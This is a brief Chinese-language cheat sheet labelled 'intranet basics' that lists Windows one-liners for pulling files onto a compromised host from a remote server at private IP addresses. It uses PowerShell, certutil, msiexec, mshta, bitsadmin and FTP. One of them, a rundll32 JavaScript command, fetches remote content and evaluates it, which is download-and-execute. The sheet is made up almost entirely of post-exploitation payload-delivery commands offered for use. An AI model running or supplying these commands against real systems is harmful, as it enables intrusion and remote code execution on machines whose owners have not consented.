技術標籤：內網基礎

powershell

(new-object Net.WebClient).DownloadFile('http://192.168.174.130/ip.txt','C:\ip.txt')

certutil

Certutil –urlcache –split –f http://192.168.174.130:8000/ip.txt

msiexec

Msiexec /q /i http://192.168.3.1/test.txt

mshta

Mshta http://192.168.174.130:8000/ip.txt

rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.130:8000/ip.txt",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
 

bitsadmin

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.174.130:8000/ip.txt" "c:\ip.txt"

ftp上傳

ftp
ftp>open ip:port
ftp>username
ftp>password
ftp>get target.exe

debug